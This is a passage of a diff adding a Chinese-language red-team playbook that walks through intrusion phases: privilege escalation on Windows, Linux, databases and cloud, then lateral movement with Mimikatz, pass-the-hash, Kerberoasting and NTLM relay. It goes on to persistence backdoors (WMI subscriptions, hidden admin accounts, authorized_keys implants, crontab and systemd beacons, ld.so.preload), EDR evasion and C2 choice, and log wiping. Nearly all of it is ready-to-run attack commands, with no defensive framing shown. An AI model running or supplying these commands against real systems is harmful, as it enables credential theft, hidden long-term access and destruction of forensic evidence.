+ | Potato 系列 | SeImpersonate 权限 | SweetPotato / GodPotato / PrintSpoofer |
200
+ | 内核漏洞 | 未打补丁 | watson / wesng 检测 |
201
+ | 服务路径劫持 | 不带引号的服务路径 | PowerUp |
202
+ | DLL 劫持 | 可写 DLL 搜索路径 | Process Monitor |
203
+ | AlwaysInstallElevated | 注册表配置 | msiexec 安装恶意 MSI |
204
+ | 计划任务 | 可写任务脚本 | schtasks 替换 |
205
+
206
+ ```powershell
207
+ # 检测 SeImpersonate
208
+ whoami /priv | findstr "SeImpersonate"
209
+
210
+ # Potato 提权
211
+ .\GodPotato.exe -cmd "cmd /c whoami"
212
+
213
+ # 自动化检测
214
+ .\winPEAS.exe
215
+ ```
216
+
217
+ ### 3.2 Linux 提权
218
+
219
+ ```bash
220
+ # SUID 检测
221
+ find / -perm -4000 -type f 2>/dev/null
222
+
223
+ # sudo 滥用
224
+ sudo -l
225
+ # 常见可利用:vim, find, python, nmap, less, awk, perl
226
+
227
+ # sudo vim 提权
228
+ sudo vim -c ':!/bin/bash'
229
+
230
+ # sudo find 提权
231
+ sudo find / -exec /bin/bash \;
232
+
233
+ # 内核漏洞
234
+ uname -r # 检查版本
235
+ # DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195)
236
+
237
+ # 自动化检测
238
+ ./linpeas.sh
239
+ ```
240
+
241
+ ### 3.3 数据库提权
242
+
243
+ ```sql
244
+ -- MSSQL xp_cmdshell
245
+ EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
246
+ EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
247
+ EXEC xp_cmdshell 'whoami';
248
+
249
+ -- MySQL UDF 提权
250
+ CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
251
+ SELECT sys_exec('id');
252
+
253
+ -- PostgreSQL
254
+ COPY (SELECT '') TO PROGRAM 'id';
255
+ ```
256
+
257
+ ### 3.4 云权限提升
258
+
259
+ ```bash
260
+ # AWS IAM 枚举
261
+ aws iam list-attached-user-policies --user-name compromised-user
262
+ # 寻找 iam:PassRole + lambda:CreateFunction → 管理员权限
263
+
264
+ # Azure AD
265
+ # 全局管理员 → 所有订阅控制
266
+ # 应用管理员 → 添加凭据到服务主体
267
+ ```
268
+
269
+ ---
270
+
271
+ ## 四、横向移动阶段(Lateral Movement)
272
+
273
+ ### 4.1 凭据获取
274
+
275
+ ```bash
276
+ # Mimikatz(Windows)
277
+ mimikatz# sekurlsa::logonpasswords
278
+ mimikatz# lsadump::dcsync /domain:target.local /user:krbtgt
279
+
280
+ # Linux 凭据
281
+ cat /etc/shadow
282
+ cat ~/.bash_history | grep -i pass
283
+ find / -name "*.conf" -exec grep -l "password" {} \;
284
+
285
+ # NTLM Hash 提取
286
+ secretsdump.py domain/user:password@dc_ip
287
+ ```
288
+
289
+ ### 4.2 Pass-the-Hash / Pass-the-Ticket
290
+
291
+ ```bash
292
+ # PTH 横向
293
+ crackmapexec smb 10.0.0.0/24 -u administrator -H <NTLM_HASH> --exec-method smbexec
294
+
295
+ # Kerberoasting
296
+ GetUserSPNs.py -request -dc-ip 10.0.0.1 domain/user:password
297
+
298
+ # AS-REP Roasting
299
+ GetNPUsers.py domain/ -usersfile users.txt -no-pass -dc-ip 10.0.0.1
300
+
301
+ # 金票据
302
+ mimikatz# kerberos::golden /user:Administrator /domain:target.local /sid:S-1-5-21-... /krbtgt:<HASH> /ptt
303
+ ```
304
+
305
+ ### 4.3 隐蔽横向技术
306
+
307
+ ```bash
308
+ # WMI 无文件执行
309
+ wmiexec.py domain/admin:password@target_ip "whoami"
310
+
311
+ # DCOM 远程执行
312
+ dcomexec.py domain/admin:password@target_ip "whoami"
313
+
314
+ # WinRM
315
+ evil-winrm -i target_ip -u admin -H <NTLM_HASH>
316
+
317
+ # PsExec(会留痕)
318
+ psexec.py domain/admin:password@target_ip
319
+
320
+ # SSH 隧道(Linux 环境)
321
+ ssh -D 1080 user@pivot_host # SOCKS 代理
322
+ ssh -L 3389:internal_host:3389 user@pivot_host # 端口转发
323
+ ```
324
+
325
+ ### 4.4 NTLM Relay
326
+
327
+ ```bash
328
+ # 关闭 Responder 的 SMB/HTTP
329
+ # 编辑 Responder.conf: SMB = Off, HTTP = Off
330
+
331
+ # 启动 Responder 捕获
332
+ responder -I eth0
333
+
334
+ # NTLM Relay 到目标
335
+ ntlmrelayx.py -tf targets.txt -smb2support
336
+
337
+ # Coercer 强制认证
338
+ coercer coerce -u user -p password -d domain -l attacker_ip -t dc_ip
339
+ ```
340
+
341
+ ### 4.5 AD 攻击路径
342
+
343
+ ```bash
344
+ # BloodHound 数据收集
345
+ bloodhound-python -d domain.local -u user -p password -c All -ns dc_ip
346
+
347
+ # 常见攻击路径:
348
+ # 1. 用户 → GenericAll → 目标用户 → 重置密码
349
+ # 2. 用户 → WriteDacl → 目标 OU → 添加权限
350
+ # 3. 计算机 → 约束委派 → 模拟任意用户
351
+ # 4. 用户 → DCSync 权限 → 导出所有 Hash
352
+
353
+ # Certipy AD CS 攻击
354
+ certipy find -u user@domain -p password -dc-ip dc_ip
355
+ certipy req -u user@domain -p password -ca CA-NAME -template VulnTemplate
356
+ ```
357
+
358
+ ---
359
+
360
+ ## 五、权限维持阶段(Persistence)
361
+
362
+ ### 5.1 Windows 持久化
363
+
364
+ | 技术 | 隐蔽性 | 检测难度 |
365
+ |------|:---:|:---:|
366
+ | 计划任务 | 中 | 低 |
367
+ | 注册表 Run 键 | 低 | 低 |
368
+ | WMI 事件订阅 | 高 | 高 |
369
+ | DLL 劫持 | 高 | 中 |
370
+ | 影子账户 | 中 | 中 |
371
+ | Golden Ticket | 极高 | 极高 |
372
+ | DSRM 后门 | 极高 | 极高 |
373
+
374
+ ```powershell
375
+ # WMI 事件订阅(高隐蔽)
376
+ $Filter = Set-WmiInstance -Class __EventFilter -Arguments @{
377
+ Name = "CoreFilter"
378
+ EventNameSpace = "root\cimv2"
379
+ QueryLanguage = "WQL"
380
+ Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
381
+ }
382
+
383
+ # 影子账户
384
+ net user support$ P@ssw0rd /add /active:yes
385
+ net localgroup administrators support$ /add
386
+ # 修改注册表 F 值克隆 RID
387
+ ```
388
+
389
+ ### 5.2 Linux 持久化
390
+
391
+ ```bash
392
+ # SSH 密钥植入
393
+ echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
394
+
395
+ # Crontab 后门
396
+ (crontab -l; echo "*/5 * * * * /tmp/.hidden/beacon") | crontab -
397
+
398
+ # LD_PRELOAD 劫持
399
+ echo "/tmp/.hidden/evil.so" > /etc/ld.so.preload
400
+
401
+ # PAM 后门
402
+ # 修改 pam_unix.so 添加万能密码
403
+
404
+ # Systemd 服务
405
+ cat > /etc/systemd/system/update.service << 'EOF'
406
+ [Unit]
407
+ Description=System Update Service
408
+ [Service]
409
+ ExecStart=/tmp/.hidden/beacon
410
+ Restart=always
411
+ [Install]
412
+ WantedBy=multi-user.target
413
+ EOF
414
+ systemctl enable update.service
415
+ ```
416
+
417
+ ### 5.3 云环境持久化
418
+
419
+ ```bash
420
+ # AWS Lambda 后门
421
+ # 创建定时触发的 Lambda 函数,回连 C2
422
+
423
+ # Azure AD 应用注册
424
+ # 创建应用 → 添加密钥凭据 → 授予 Graph API 权限
425
+
426
+ # 容器后门
427
+ # 修改基础镜像 → 所有新容器自带后门
428
+ ```
429
+
430
+ ---
431
+
432
+ ## 六、EDR/AV 绕过(Evasion)
433
+
434
+ ### 6.1 核心绕过思路
435
+
436
+ | 层面 | 技术 | 说明 |
437
+ |------|------|------|
438
+ | 静态检测 | 加密/混淆/自定义加载器 | 避免签名匹配 |
439
+ | 行为检测 | 间接系统调用/Unhooking | 绕过 API Hook |
440
+ | 内存检测 | 模块踩踏/堆加密 | 避免内存扫描 |
441
+ | 网络检测 | 域前置/合法服务隧道 | 混入正常流量 |
442
+ | 日志检测 | ETW Patching/日志清除 | 减少痕迹 |
443
+
444
+ ### 6.2 实用绕过技术
445
+
446
+ ```
447
+ 1. Shellcode 加载器自定义(不用公开工具)
448
+ 2. 系统调用直接调用(绕过 ntdll hook)
449
+ 3. 进程注入选择低监控进程(如 RuntimeBroker.exe)
450
+ 4. C2 流量走 HTTPS + 域前置 / Cloudflare Workers
451
+ 5. 内存中执行,不落盘(Fileless)
452
+ 6. 利用合法签名程序加载(LOLBins)
453
+ ```
454
+
455
+ ### 6.3 C2 框架选择
456
+
457
+ | 框架 | 特点 | 适用场景 |
458
+ |------|------|---------|
459
+ | Cobalt Strike | 成熟稳定,团队协作 | 大型红队行动 |
460
+ | Sliver | 开源,Go 编写 | 预算有限 |
461
+ | Havoc | 现代化,模块化 | 需要定制 |
462
+ | Mythic | 多 agent 支持 | 跨平台 |
463
+ | AdaptixC2 | Kali 2026.1 收录 | 快速部署 |
464
+
465
+ ---
466
+
467
+ ## 七、痕迹清理(Anti-Forensics)
468
+
469
+ ```bash
470
+ # Windows 日志清除
471
+ wevtutil cl Security
472
+ wevtutil cl System
473
+ wevtutil cl Application
474
+
475
+ # Linux 日志清除
476
+ echo > /var/log/auth.log
477
+ echo > /var/log/syslog
478
+ history -c && history -w
479
+
480
+ # 时间戳修改
481
+ touch -t 202301010000 /path/to/file
482
+
483
+ # 内存清理
484
+ # 确保 Mimikatz dump 已删除
485
+ # 确保 C2 beacon 已退出
486
+ # 确保临时文件已清除
487
+ ```
488
+
489
+ ---
490
+